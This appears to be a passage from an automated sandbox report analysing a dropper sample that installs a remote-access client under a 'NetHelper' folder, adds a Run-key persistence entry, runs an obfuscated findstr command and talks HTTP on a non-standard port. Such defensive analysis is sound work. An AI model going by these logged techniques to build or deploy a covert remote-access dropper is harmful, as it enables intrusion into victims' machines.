                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeFile created: C:\Users\user\AppData\Local\Temp\38.zipJump to behavior
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_00412B20 CoCreateInstance,0_2_00412B20
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeMutant created: \Sessions\1\BaseNamedObjects\CAHomeNetworkViewerMAINAPP
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1972:120:WilError_01
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCommand line argument: Path0_2_00418860
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCommand line argument: 8C0_2_00418860
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeFile written: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\nsm_vpro.iniJump to behavior
                                Source: Yara matchFile source: 9.0.rrrr.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000009.00000000.626833911.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile read: C:\Windows\System32\drivers\etc\hosts
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile read: C:\Windows\System32\drivers\etc\hosts
                                Source: C:\Users\user\AppData\Local\Temp\SETUP_44067\Engine.exeWindow found: window name: TComboBoxJump to behavior
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeFile opened: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\MSVCR100.dllJump to behavior
                                Source: 0ud2VlMOvF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe, 00000001.00000002.828774382.000000006CFC1000.00000020.00000001.01000000.00000009.sdmp, client32.exe, 00000002.00000002.350769337.000000006CFC1000.00000020.00000001.01000000.00000009.sdmp, client32.exe, 00000003.00000002.369216420.000000006CFC1000.00000020.00000001.01000000.00000009.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000002.00000002.350416084.0000000011194000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000003.00000002.368942181.0000000011194000.00000002.00000001.01000000.00000006.sdmp
                                Source: Binary string: \Stub.pdb source: 0ud2VlMOvF.exe, 00000000.00000002.627468833.00000000008E0000.00000004.00001000.00020000.00000000.sdmp
                                Source: Binary string: psapi.pdb source: rrrr.exe, 00000009.00000003.632122574.0000000002760000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.632252203.0000000002224000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631683973.0000000002660000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631975000.0000000002660000.00000004.00001000.00020000.00000000.sdmp, Engine.exe, 0000000A.00000000.643264856.0000000000555000.00000008.00000001.01000000.0000000F.sdmp
                                Source: Binary string: C:\CruiseControl\projects\Shared-5.0.0\compilation_unit\x86\canetvwr\canvGUI\win32rel\canetworkvwr.pdb source: 0ud2VlMOvF.exe, 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmp, 0ud2VlMOvF.exe, 00000000.00000000.303146283.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: client32.exe, 00000001.00000002.828711123.000000006CDC0000.00000002.00000001.01000000.0000000B.sdmp
                                Source: Binary string: C:\Users\Admin\Desktop\Dropper\NetDropper\Release\Stub.pdb source: 0ud2VlMOvF.exe, 0ud2VlMOvF.exe, 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, 0ud2VlMOvF.exe, 00000000.00000003.307831849.0000000000910000.00000004.00001000.00020000.00000000.sdmp
                                Source: Binary string: gacutil.pdb source: rrrr.exe, 00000009.00000003.631554051.00000000022E2000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.632122574.0000000002760000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.632252203.0000000002224000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631683973.0000000002660000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631975000.0000000002660000.00000004.00001000.00020000.00000000.sdmp, Engine.exe, 0000000A.00000000.643264856.0000000000555000.00000008.00000001.01000000.0000000F.sdmp
                                Source: Binary string: C:\Users\Admin\Desktop\Dropper\NetDropper\Release\Stub.pdb@ source: 0ud2VlMOvF.exe, 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, 0ud2VlMOvF.exe, 00000000.00000003.307831849.0000000000910000.00000004.00001000.00020000.00000000.sdmp
                                Source: Binary string: gacutil.pdb\i386\bbt\gacutil.pdbHo# source: rrrr.exe, 00000009.00000003.631554051.00000000022E2000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.632122574.0000000002760000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.632252203.0000000002224000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631683973.0000000002660000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631975000.0000000002660000.00000004.00001000.00020000.00000000.sdmp, Engine.exe, 0000000A.00000000.643264856.0000000000555000.00000008.00000001.01000000.0000000F.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: client32.exe, 00000001.00000002.828933690.000000006D082000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000002.00000002.350926851.000000006D082000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000003.00000002.369369954.000000006D082000.00000002.00000001.01000000.00000008.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: client32.exe, 00000001.00000002.828711123.000000006CDC0000.00000002.00000001.01000000.0000000B.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000001.00000002.828987104.000000006D095000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 00000002.00000002.350955036.000000006D095000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 00000003.00000002.369407860.000000006D095000.00000002.00000001.01000000.00000007.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1250\1250\client32\release_unicode\client32.pdb source: client32.exe, 00000001.00000002.827413930.0000000000E32000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000001.00000000.319169996.0000000000E32000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000002.00000002.350058442.0000000000E32000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000002.00000000.347982915.0000000000E32000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000003.00000002.368688274.0000000000E32000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000003.00000000.367232590.0000000000E32000.00000002.00000001.01000000.00000005.sdmp
                                Source: Binary string: \i386\bbt\gacutil.pdb source: rrrr.exe, 00000009.00000003.631554051.00000000022E2000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.632122574.0000000002760000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.632252203.0000000002224000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631683973.0000000002660000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631975000.0000000002660000.00000004.00001000.00020000.00000000.sdmp, Engine.exe, 0000000A.00000000.643264856.0000000000555000.00000008.00000001.01000000.0000000F.sdmp
                                Source: Binary string: \Stub.pdb@ source: 0ud2VlMOvF.exe, 00000000.00000002.627468833.00000000008E0000.00000004.00001000.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000002.00000002.350416084.0000000011194000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000003.00000002.368942181.0000000011194000.00000002.00000001.01000000.00000006.sdmp

                                Data Obfuscation

                                barindex
                                Detected unpacking (creates a PE file in dynamic memory)
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeUnpacked PE file: 0.2.0ud2VlMOvF.exe.950000.1.unpack
                                Obfuscated command line found
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^cruzVehicleRespectiveDiane$" Players
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^cruzVehicleRespectiveDiane$" Players Jump to behavior
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_004212D9 push ecx; ret 0_2_004212EC
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_0041CBB4 push ecx; ret 0_2_0041CBC7
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_1116FF15 push ecx; ret 1_2_1116FF28
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_1116AE09 push ecx; ret 1_2_1116AE1C
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_0042A89D LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,__invoke_watson,GetProcAddress,GetProcAddress,__invoke_watson,0_2_0042A89D
                                Source: 0ud2VlMOvF.exeStatic PE information: section name: .hnvshr
                                Source: PCICL32.DLL.0.drStatic PE information: section name: .hhshare
                                Source: initial sampleStatic PE information: section name: DATA entropy: 7.307100544843289
                                Source: initial sampleStatic PE information: section name: .text entropy: 6.909044922675825
                                Source: initial sampleStatic PE information: section name: UPX0
                                Source: initial sampleStatic PE information: section name: UPX1

                                Persistence and Installation Behavior

                                barindex
                                Drops PE files with a suspicious file extension
                                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifJump to dropped file
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeFile created: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeFile created: C:\Users\user\AppData\Local\Temp\rrrr.exeJump to dropped file
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeFile created: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\msvcr100.dllJump to dropped file
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeFile created: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeFile created: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\AudioCapture.dllJump to dropped file
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeFile created: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\PCICHEK.DLLJump to dropped file
                                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifJump to dropped file
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeFile created: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\PCICL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeFile created: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeJump to dropped file
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeFile created: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeFile created: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\pcicapi.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\rrrr.exeFile created: C:\Users\user\AppData\Local\Temp\SETUP_44067\Engine.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\rrrr.exeFile created: C:\Users\user\AppData\Local\Temp\SETUP_44067\Setup.txtJump to behavior
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NetHelperJump to behavior
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NetHelperJump to behavior

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Uses known network protocols on non-standard ports
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 2552
                                Source: unknownNetwork traffic detected: HTTP traffic on port 2552 -> 49697
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 2552
                                Source: unknownNetwork traffic detected: HTTP traffic on port 2552 -> 49697
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 2552
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 2552
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 2552
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 2552
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,1_2_110C1020
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_11113380 IsIconic,GetTickCount,1_2_11113380
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,1_2_110CB750
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,1_2_110CB750
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,1_2_111236E0
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,1_2_111236E0
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,1_2_11113FA0
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_0040EBD0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040EBD0
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\SETUP_44067\Engine.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
